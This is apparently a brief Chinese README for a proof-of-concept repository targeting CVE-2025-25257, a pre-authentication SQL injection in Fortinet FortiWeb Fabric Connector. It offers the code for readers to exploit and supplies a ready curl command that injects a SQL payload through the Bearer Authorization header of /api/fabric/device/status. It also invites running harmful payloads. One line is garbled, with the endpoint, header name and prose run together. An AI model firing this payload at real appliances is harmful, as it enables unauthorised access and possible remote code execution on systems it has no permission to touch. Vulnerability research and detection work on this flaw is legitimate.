CVE-2025-25257 是 Fortinet FortiWeb Fabric Connector 7.0 至 7.6.x 版本中的一个预认证 SQL 注入漏洞。
此缺陷允许攻击者向易受攻击的 API 端点注入恶意 SQL 命令,从而可能导致远程代码执行 (RCE)。
本仓库包含一个PoC,以安全可控的方式演示 SQL 注入向量。
它是开源的,供你利用。-
/api/fabric/device/statusAuthorization: Bearer 头部并包含精心设计的负载以下 curl 命令演示了SQL 注入检测,你可以执行有害负载:
curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
https://<fortiweb-ip>/api/fabric/device/status